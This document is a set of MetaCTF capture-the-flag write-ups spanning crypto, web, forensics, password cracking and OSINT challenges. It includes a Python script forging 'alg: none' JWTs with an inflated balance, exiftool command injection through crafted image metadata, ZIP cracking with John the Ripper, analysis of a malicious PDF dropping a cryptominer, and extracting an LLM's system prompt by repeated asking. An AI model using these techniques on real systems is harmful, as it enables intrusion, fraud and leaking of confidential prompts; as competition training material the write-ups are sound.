Challenge: Office Softbinary (cryptography)

Description: My coworkers started emailing each other with this weird looking code, can you figure out what they’re saying? I need to know what’s going on with the office softball game!

01001101 01100101 01110100 01100001 01000011 01010100 01000110 01111011 01101000 00110011 01011111 01101000 00110001 00110111 01011111 01110100 01101000 00110011 01011111 01100010 00110100 01101100 00110001 01011111 00110100 01101110 01100100 01011111 01100111 00110000 01110100 01011111 01110100 00110000 01011111 01110011 00110011 01100011 00110000 01101110 01100100 01011111 01100010 00110100 00110101 00110011 01111101

🏁 Flag format: MetaCTF{…}`

Trying the Binary

Since the code looked like binary, I saved it to a file:

echo '01001101 01100101 01110100 01100001 01000011 01010100 01000110 01111011 01101000 00110011 01011111 01101000 00110001 00110111 01011111 01110100 01101000 00110011 01011111 01100010 00110100 01101100 00110001 01011111 00110100 01101110 01100100 01011111 01100111 00110000 01110100 01011111 01110100 00110000 01011111 01110011 00110011 01100011 00110000 01101110 01100100 01011111 01100010 00110100 00110101 00110011 01111101' > softbinary.txt

Then I decoded it using this command:

perl -lpe '$_=pack("B*",join("",split(" ")))' softbinary.txt

🏁 Flag

MetaCTF{h3_h17_th3_b4l1_4nd_g0t_t0_s3c0nd_b453}

Challenge: Horse Source (web)

Description: I’ve been working on a fun javascript based game to play horse with a computer, would you like to give it a shot?

Check out the game here.

PS: Maybe you’ll find my easter egg in the code…

🏁 Flag format: MetaCTF{…}`

landing the page

Analyzing the source code

I inspected the source code and found the flag hidden in a comment:

MetaCTF{y0u_g0t_4_l1c3n5e_f0r_th4t_h0rs3_m4t3}

🏁 Flag

MetaCTF{y0u_g0t_4_l1c3n5e_f0r_th4t_h0rs3_m4t3}

Challenge: Spam? (reverse engineering)

Description: Our corporate email gateway flagged a message. Here’s the raw export of it. Can you see what’s in it?

🏁 Flag format: MetaCTF{…}

Analyzing the email

The attachment is a base64-encoded PNG embedded in the raw email.

1
Delivered-To: netspark@metactf.com
2
Received: by 10.36.33.216 with SMTP id e207csp2066718ita;
3
        Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
4
X-Received: by 10.182.16.226 with SMTP id j2mr32770358obd.4.1446011281654;
5
        Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
6
Return-Path: <contact@metactf.com>
7
Received: from mail-oi0-x229.google.com (mail-oi0-x229.google.com. [2607:f8b0:4003:c06::229])
8
        by mx.google.com with ESMTPS id s128si16353256oig.118.2015.10.27.22.48.01
9
        for <netspark@metactf.com>
10
        (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
11
        Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
12
Received-SPF: pass (google.com: domain of contact@metactf.com designates 2607:f8b0:4003:c06::229 as permitted sender) client-ip=2607:f8b0:4003:c06::229;
13
Authentication-Results: mx.google.com;
14
       spf=pass (google.com: domain of contact@metactf.com designates 2607:f8b0:4003:c06::229 as permitted sender) smtp.mailfrom=contact@metactf.com;
15
       dkim=pass header.i=@gmail.com;
16
       dmarc=pass (p=NONE dis=NONE) header.from=gmail.com
17
Received: by mail-oi0-x229.google.com with SMTP id s66so83023344oie.1
18
        for <netspark@metactf.com>; Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
19
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
20
        d=gmail.com; s=20120113;
21
        h=mime-version:date:message-id:subject:from:to:content-type;
22
        bh=Yu+JZItOgwAy12c+kj3AXu1scr8uu7bs5ASGzTGC9hY=;
23
        b=S/+xYaZvBG5DStmiVR6LeRaVgYbxXfkeLvfgeMlVO/MRm7zvf7L+vh4RXBI+eM+VdY
24
         M1VPA2YvO25I9JwW0Wxts0NyVU61MkpxVhKgGvlvUUgDgLfZmRqb9qizq9BUJ5bAR3Q1
25
         zdnaK0FTzjgUkbD6pcNB1RRxsKwA7p5ziAE7fjcc3zkiqo6tmiPVzfE3v1FURuuMKmeC
26
         t7l+cbCgWOZQ+Y/d3pInvd/q+4dSdBwWOvsPPth6lRGpmucSyi7UkHnkv5qR1QIxI0Ef
27
         i/EdikXah1v+je4Y6OXN6KrDz/RURlzNmIrJPV1oY13H4tfdK3EyYDb5nqMoWpp9pa6U
28
         MqnA==
29
MIME-Version: 1.0
30
X-Received: by 10.202.94.133 with SMTP id s127mr30725847oib.92.1446011281365;
31
 Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
32
Received: by 10.202.54.138 with HTTP; Tue, 27 Oct 2015 22:48:01 -0700 (PDT)
33
Date: Wed, 28 Oct 2015 01:48:01 -0400
34
Message-ID: <CAMSY=h+RVrPMyApq_uEsv4_a91KVC5hVG4uU4w_mTYpA9nFKxw@mail.gmail.com>
35
Subject: Hi!
36
From: PI CIT <contact@metactf.com>
37
To: Roman Bohuk <netspark@metactf.com>
38
Content-Type: multipart/mixed; boundary=001a113d4a2ec510b5052323bcf2
39

40
--001a113d4a2ec510b5052323bcf2
41
Content-Type: multipart/alternative; boundary=001a113d4a2ec510a9052323bcf0
42

43
--001a113d4a2ec510a9052323bcf0
44
Content-Type: text/plain; charset=UTF-8
45

46
I've attached an image to this email. It should have everything you need.
47

48
--001a113d4a2ec510a9052323bcf0
49
Content-Type: text/html; charset=UTF-8
50

51
<div dir="ltr">I&#39;ve attached an image to this email. It should have everything you need.</div>
52

53
--001a113d4a2ec510a9052323bcf0--
54
--001a113d4a2ec510b5052323bcf2
55
Content-Type: image/png; name="flag.png"
56
Content-Disposition: attachment; filename="flag.png"
57
Content-Transfer-Encoding: base64
58
X-Attachment-Id: f_igadrkr30
59

60
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
155
--001a113d4a2ec510b5052323bcf2--

Recovery Steps

1. extract the base64 block and decode to a PNG:

2. render the PNG:

🏁 Flag

MetaCTF{wasnt_base_10_more_than_enough_already}

Challenge: Large Language Protocol (misc)

Description: I got tired of manually implementing so many network protocols, so why not just let an LLM respond as every network protocol? I just really hope no one can steal my proprietary prompt…

Try prompt injection

Simply just asking the LLM for the system prompt i think its worked with any protocol but u have to try a few times

🏁 Flag

MetaCTF{pr0m7_1nj3c710n_1n_3v3ry_pr0t0c0l}

Challenge: TruncShop (misc)

Description: Welcome to TruncShop! We’ve built a secure shopping system using precise numerical calculations. Our currency converter is state-of-the-art and ensures you can’t get more than what you pay for. Can you find a way to bypass our checks and purchase the flag item?

Analyzing the challenge

As you can see the shop has an item called “Secure Flag Vault” that costs 100.00 coins / 33 gems.

Trying buy and sell functionality

with initial coins i tried to buy 2 coffees and then sell them back and notice that i receive payment in gems instead of coins

Exploiting truncation

with that i tried to exchange gems back to coins and noticed that the with the challenge name “TruncShop” it might be vulnerable to truncation attack so i tried exchanging 1.9999999999 gems to coins and it worked the program truncated the value 1.9999999999 gems to 2 gems and gave me 5.99 coins but only deducted 1 gems from my balance

Buying the flag

with that i exchanged gems to coins multiple times until i had enough coins to buy the flag

🏁 Flag

MetaCTF{7rUnC4t10n_C4n_L34d_70_Un3xp3c73d_V4lu35}

Challenge: MetaLens Pro (web)

Description: Welcome to MetaLens Pro, our state-of-the-art image metadata analysis platform. Security researchers have raised concerns about potential vulnerabilities in our processing pipeline.

Can you demonstrate how an attacker might compromise our systems?

🏁 Flag format: MetaCTF{…}

Analyzing the upload functionality

I inspected the upload functionality and noticed that the application uses the exiftool command to extract metadata from uploaded images. and noticed that there is a version of exiftool showing.

finding the payload

I researched the exiftool version 12.23 and found that it is vulnerable to command execution via specially crafted metadata.

crafting the payload

I found a github repository that provides a payload generator for exiftool command injection.

generating the malicious image

I used the generator to create a payload that would execute a command to read the flag file.

uploading the payload

I uploaded the crafted image with the malicious metadata to the MetaLens Pro application. Upon processing, the application executed the injected command, allowing me to retrieve list of files in the directory.

retrieving the flag

As shown i was able to read the flag file using the command injection vulnerability in exiftool.

🏁 Flag

MetaCTF{exif_to0l_versi0n_c4n_kill_you}

Challenge: None Shall Pass (web)

Description: We built a cool website that uses JWT for authentication. Simple and safe, right? Or is it…?

🏁 Flag format: MetaCTF{…}

Analyzing the web application

When you first open MetaShop, it just looks like a normal shop landing page. There’s Login / Register in the top right.

Registering a new user

So first thing we do is register then login.

Browsing the products

On the products page, we see a bunch of items: laptops, phones, earbuds, etc. In the navbar it says: Your Balance: $10.0

Then we scroll down and see something interesting: There’s an item literally called FLAG.Price: $1337.00. So yeah. The site is selling the flag as an item in the store. The problem: we’re broke. We only have $10 and the flag costs $1337.

Inspecting the cookie

Also after logging in, the app sets a cookie for us. That cookie is a JWT.

Decoding the JWT

We can decode the JWT using any online tool. The payload contains our user information: user_id and balance etc. Key detail: the JWT payload literally includes balance: 10. So balance is not stored server-side only. It’s stored INSIDE THE TOKEN that lives in our browser. Which means if we edit this, and the site is dumb enough to trust it, we basically generate money out of thin air.

Modifying the JWT

import base64
import json

# Original payload with increased balance
payload = {
    "user_id": xxx,
    "username": "xxx",
    "balance": 999999,
    "role": "user",
    "exp": 1761461938
}

# Different algorithm variations
algorithms = ["none", "None", "NONE", "nOne"]

for alg in algorithms:
    header = {"alg": alg, "typ": "JWT"}

    # Encode header and payload
    header_encoded = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
    payload_encoded = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=')

    # Token with no signature
    token = f"{header_encoded}.{payload_encoded}."
    print(f"Algorithm '{alg}': {token}")

I modified the JWT payload to increase my balance to a ridiculous amount. I also changed the algorithm in the header to “None” to bypass signature verification. But as some frameworks are case-sensitive, I tried different variations like “none”, “None”, “NONE”, and “nOne”.

Using the modified JWT

I replaced my JWT cookie with the modified token. Now when I refresh the page, my balance shows as $999999. With all that fake money, I can finally buy the flag item.

🏁 Flag

MetaCTF{JWT_Non3_4lg_3xpl01t}

Challenge: Banksman (forensics)

Description: Our professor received a report from an unfamiliar student and realized that something about it wasn’t right and turned it into a research assignment. Analyze the file. Is there anything mysterious embedded in it?

Download the “report” in question to solve the challenge

🏁 Flag format: MetaCTF{…}

Looking at the PDF

The file we get is report.pdf. When you open it in a PDF viewer, it just looks like a normal academic paper about animal research ethics. Nothing obviously evil. Which is exactly what evil looks like, tbh. So instead of trusting the UI, we start doing static analysis.

Basic PDF triage with pdfid

pdfid report.pdf

Output shows some interesting stuff

1
/JavaScript 1
2
/JS 1
3
/OpenAction 1

Those fields are red flags in PDF land.

Quick breakdown:

• /JavaScript and /JS means there’s embedded JavaScript inside the PDF.
• /OpenAction means “run this action automatically when the PDF is opened.”

So yeah. This “research report” tries to run JavaScript on open. At this point we know there’s code in there. Next step is to extract it.

Dig into the objects with pdf-parser

pdf-parser --search javascript report.pdf

Search for anything related to JavaScript and we find object 5 0

pdf-parser --object 5 --filter --raw report.pdf > js.txt

We eventually get dumped output for object 5 0

The /JS key is followed by a huge blob of hex. That blob is the actual script the PDF wants to run. So the JavaScript is hidden in object 5, and it’s getting executed automatically using /OpenAction. Classic malicious PDF behavior.

Decoding the JavaScript

After decoding, we get .js file, The code looks sketchy in exactly the way you’d expect malware to look sketchy.

Send it to VirusTotal

We take the decoded JS and upload to VirusTotal to see what behavior it shows. Result: 32/62 vendors flag it as malicious.

Dropped payload analysis

In the Relations tab, we get something super useful: The sandbox shows that this script eventually produces/drops another file called word.exe.

We follow the trail and open the sandbox report for word.exe.

Behavior of word.exe

The sandbox report for word.exe says: 52/73 vendors flag it as malicious

Finding the flag in process arguments

Scrolling through process activity, we see commands that the malware runs. One of them is launching a miner (cryptominer), and it passes in credentials / worker name / pool info on the command line. Inside that command line we see:

MetaCTF{I_4m_n0t_@_m1n3r_1_@m_a_b4nk5m4n}

🏁 Flag

MetaCTF{I_4m_n0t_@_m1n3r_1_@m_a_b4nk5m4n}

Challenge: Predictable Password Protection (cryptography)

Description: We intercepted this sysadmin emailing himself password csv backups, and it seems like his master passwords are predictably weak. Our analysts were able to crack all but the latest dump, can you crack the first 5, find a pattern, then crack the 6th?

Download all 6 password dumps here.

🏁 Flag format: MetaCTF{…}

Extract the dump and look around

We start with the provided password_dumps.zip. Unzip that first layer to get all the inner password dumps.

So yeah, six ZIPs inside.

When we try to unzip one (like passwords.zip) we immediately get prompted for a password

Crack the ZIP password with John

We can’t unzip without the password, so we’re going to crack the ZIPs using john (John the Ripper). Format for encrypted ZIP is pkzip, so John supports it out of the box.

Workflow is basically:

• Get the hash from the ZIP.
• Feed that hash to john with a wordlist.

Example: cracking passwords.zip

We grabbed its hash you can extract ZIP hashes with zip2john

$ zip2john passwords.zip > hash1

Then:

john --format=pkzip --wordlist=/usr/share/wordlists/rockyou.txt hash1
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
naruto427         (passwords.zip/passwords.csv)
Session completed.

John cracked it:

naruto427 (passwords.zip/passwords.csv)

So the first archive uses a basic password (anime + numbers). This is our signal that the rest is predictable.

Crack the last one using the pattern

I generate a custom wordlist based on that pattern (probably anime titles + common numeric suffixes). Then re-run john just on the stubborn hash:

john --format=pkzip --wordlist=wordlist_numbered.txt all_hashes.txt
Loaded 6 password hashes with 6 different salts (PKZIP [32/64])
Remaining 1 password hash
Will run 4 OpenMP threads
Chainsawman715   (passwords6.zip/passwords.csv)
Session completed.

So the uncracked archive (passwords6.zip) ended up using:

Chainsawman715

Which fits the exact same pattern:

“Chainsawman” (anime/manga) + numbers (715)

Once we have that password, we can finally unzip the final dump.

Extract the final CSV and read it

Now that we know the password for passwords6.zip is Chainsawman715, we can unzip it

Then just read the CSV:

$ cat passwords.csv
Service,Username,Password
AdminPanel,admin_user,AlchemyCircleCore
MailServer,sysadmin,FullMetalBarrel
...
DomainAdmin,MetaCTF{chainsaw_hashes_to_shreads}

So the CSV from the most recent dump literally hands us the flag.

🏁 Flag

MetaCTF{chainsaw_hashes_to_shreads}

Challenge: Flag Portfolio (Reconnaissance)

Description: I just “drew” this pixel art image using my own toolset! I’m not allowed to self-advertise my content here but I trust you’ll be able to find it if you’re smart enough :)

The flag format is MetaCTF{WORD1_WORD2_WORD3} where each word is an animal/creature.

🏁 Flag format: MetaCTF{…}

Look at the provided image’s metadata

I start by looking at the provided pixel art image locally. I run exiftool to dump its metadata.

The metadata is super revealing:

It logs the exact model checkpoint: "ckpt_name": "plantMilkModelSuite_walnut.safetensors"

It logs the LoRA used: "lora_name": "pixelartmodel_super1337.safetensors"

Those names are my pivot points.

Investigate the base checkpoint

First I look up the base model from the metadata: plantMilkModelSuite_walnut.safetensors

I search for that on google. The top hit I get is a Civitai model called: Plant Milk 🌿 - Model Suite - Walnut | Illustrious Checkpoint

This matches the “ckpt_name” in the image metadata almost exactly. So I can confirm the main checkpoint used to generate the image is public on Civitai.

Now I need to follow the LoRA.

Investigate the LoRA

Back in the image metadata I saw: "lora_name": "pixelartmodel_super1337.safetensors”

I search for that. That name brings me to Hugging Face.

The repo is: mrketchup/pixelartmodel_super1337

So:

• The LoRA is hosted by a user named mrketchup.
• The repo is named after the LoRA (pixelartmodel_super1337).
• It’s publicly accessible.

This is the “self-advertise” the challenge text was teasing. The author didn’t openly link their profile, but they accidentally left their LoRA path inside the PNG metadata. That gives me the username: mrketchup.

Now that I have a handle, I can pivot.

Pivot on the username mrketchup

I go back to Civitai and use its search bar to look for that same username.

What I do:

• Search for mrketchup in the global search.
• Switch to the “Users” tab in the filters.
• I get a Civitai account named mrketchup.

So I open their profile.

Check their posted images

On the mrketchup profile, I scroll through their gallery.

I see they’ve posted multiple generated images. That gives me the flag.

🏁 Flag

MetaCTF{GODZILLA_CAT_DOG}